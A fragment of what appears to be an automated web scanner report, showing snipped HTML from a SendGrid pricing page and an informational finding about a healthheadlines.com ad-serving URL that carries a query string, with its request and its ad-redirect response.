src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td><img width="17" height="14" src="http://d2gramajkvysi4.cloudfront.net/images/pricing/check.png?r=1309887400" /> </td>...[SNIP]... <a title="Twitter" href="http://twitter.com/sendgrid"> Twitter</a>...[SNIP]... .sendgrid.com/feed/"><img alt="RSS" title="Feed" src="http://d2gramajkvysi4.cloudfront.net/images/social/rss.gif?r=1309887434" /> </a><a href="http://twitter.com/SendGrid"> <img alt="Twitter" title="Twitter" src="http://d2gramajkvysi4.cloudfront.net/images/social/twitter.gif?r=1309887433" /> </a><a href="http://www.facebook.com/SendGrid"> <img alt="Facebook" title="Facebook" src="http://cdn.sendgrid.com/images/social/facebook.gif?r=1309887433" />...[SNIP]... <script type="text/javascript" src="http://d2gramajkvysi4.cloudfront.net/js/new/placeholders.gz.js?r=1309887505"> </script>...[SNIP]... <script type="text/javascript" src="http://edge.quantserve.com/quant.js"> </script><img src="http://pixel.quantserve.com/pixel/p-de_F6qVUp9bug.gif?labels=_fp.event.Pricing+Page" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> ...[SNIP]...
15.41. http://srv.healthheadlines.com/s.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://srv.healthheadlines.com
Path:
/s.php
Issue detail
The page was loaded from a URL containing a query string:http://srv.healthheadlines.com/s.php?c=51&d=9&t=0.08053325628861785&n=1133000173&k=http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ%26num%3D1%26sig%3DAOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw%26client%3Dca-pub-3796773913386149%26adurl%3D http://c2462822.r22.cf0.rackcdn.com/82_ad_07.png http://c2462832.r32.cf0.rackcdn.com/1168_SmokingWoman_80x60.jpg http://c2462832.r32.cf0.rackcdn.com/404_eng80x60.jpg http://c2462832.r32.cf0.rackcdn.com/7_BandanaMan_80x60.jpg http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAAUgAAAGQAAAAFAAAABwAAAAUAAAG1AAAA&b=yAAAACIAAAGUAAAAKQAAAZQAAAEsAAAAFAAABJAAAAAaAAAAuQ%3D%3D&t=0&i=6&r=http%3A%2F%2Fwww.PeakLife.com%2Fbridge%2Frad_srv_9%2F1133000173%2Fpid%3D200 http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAAUgAAAGQAAAAFAAAABwAAAAUAAAG1AAAA&b=yAAAACIAAAGUAAAAKQAAAZQAAAEsAAAAFAAABJAAAAAaAAAAuQ%3D%3D&t=0&i=7&r=http%3A%2F%2Fwww.ForceFactor.com%2Fbridge%2Frad_srv_9%2F1133000173%2Fpid%3D100 http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAAUgAAAGQAAAAFAAAABwAAAAUAAAG1AAAA&b=yAAAACIAAAGUAAAAKQAAAZQAAAEsAAAAFAAABJAAAAAaAAAAuQ%3D%3D&t=0&i=9&r=http%3A%2F%2Fwww.MyStagesofBeauty.com%2Fbridge%2Frad_srv_9%2F1133000173%2Fpid%3D300
Request
GET /s.php?c=51&d=9&t=0.08053325628861785&n=1133000173&k=http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ%26num%3D1%26sig%3DAOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw%26client%3Dca-pub-3796773913386149%26adurl%3D HTTP/1.1/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKBRE1BQUFBSkFBQUFVZ0FBQUdRQUFBQUZBQUFBQndBQUFBVUFBQUcxQUFBQXx5QUFBQUNJQUFBR1VBQUFBS1FBQUFaUUFBQUVzQUFBQUZBQUFCSkFBQUFBYUFBQUF1UT09fHx8MXwxMzE2MTkwMDI3; path=/; domain=.healthheadlines.com; httponly/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type...[SNIP]... <img id="advertorials" src="http://c2462822.r22.cf0.rackcdn.com/82_ad_07.png" width="188" height="24" alt="Advertorials" /> </div> <a class="section sec1" href="http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAAUgAAAGQAAAAFAAAABwAAAAUAAAG1AAAA&b=yAAAACIAAAGUAAAAKQAAAZQAAAEsAAAAFAAABJAAAAAaAAAAuQ%3D%3D&t=0&i=7&r=http%3A%2F%2Fwww.ForceFactor.com%2Fbridge%2Frad_srv_9%2F1133000173%2Fpid%3D100" target="_blank" title="He Weighs 170, Benches 420"> <img src="http://c2462832.r32.cf0.rackcdn.com/7_BandanaMan_80x60.jpg" width="80" height="60" alt="He Weighs 170, Benches 420" title="He Weighs 170, Benches 420" /> <div class="text_section">...[SNIP]... <a class="section" href="http://yads.zedo.com/ads2/c?a=947253;x=2304;g=172;c=1133000173,1133000173;i=0;n=1133;i=0;u=k5xiThcyanucBq9IXvhSGSz5~090311;1=8;2=1;e=i;s=24;g=172;w=47;m=82;z=0.8216961014550179;p=6;f=1160000;h=1021994;k=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BEX0mCndzTsf0DcOJgALUrb3-BsL17uACur-rqCqi06q2TaCNBhABGAEgsLnXBjgAUIWt2Zv9_____wFgyQagAY6tjM0DsgEQcG9ydGFsLm9wZXJhLmNvbboBCjMwMHgyNTBfYXPIAQnaARhodHRwOi8vcG9ydGFsLm9wZXJhLmNvbS-4AhjAAgHIApqHwSCoAwHoA6UB6AMQ6AONA_UDAAgAAPUDMgCAAaAGEQ&num=1&sig=AOD64_2ztssrmiGfz4QREAFMwUEJdXtTPw&client=ca-pub-3796773913386149&adurl=http://srv2.healthheadlines.com/t.php?e=90186&a=AIvJnAAAADMAAAAJAAAAUgAAAGQAAAAFAAAABwAAAAUAAAG1AAAA&b=yAAAACIAAAGUAAAAKQAAAZQAAAEsAAAAFAAABJAAAAAaAAAAuQ%3D%3D&t=0&i=6&r=http%3A%2F%2Fwww.PeakLife.com%2Fbridge%2Frad_srv_9%2F1133000173%2Fpid%3D200" target="_blank" title="Age 50+ How to Stay Asleep All Night"> <img src="http://c2462832.r32.cf0.rackcdn.com/404_eng80x60.jpg" width="80" height="60" alt="Age 50+ How to Stay Asleep All Night" title="Age 50+ How to Stay Asleep All Night" /> <div class="text_section">...[SNIP]... <a class="section sec3" 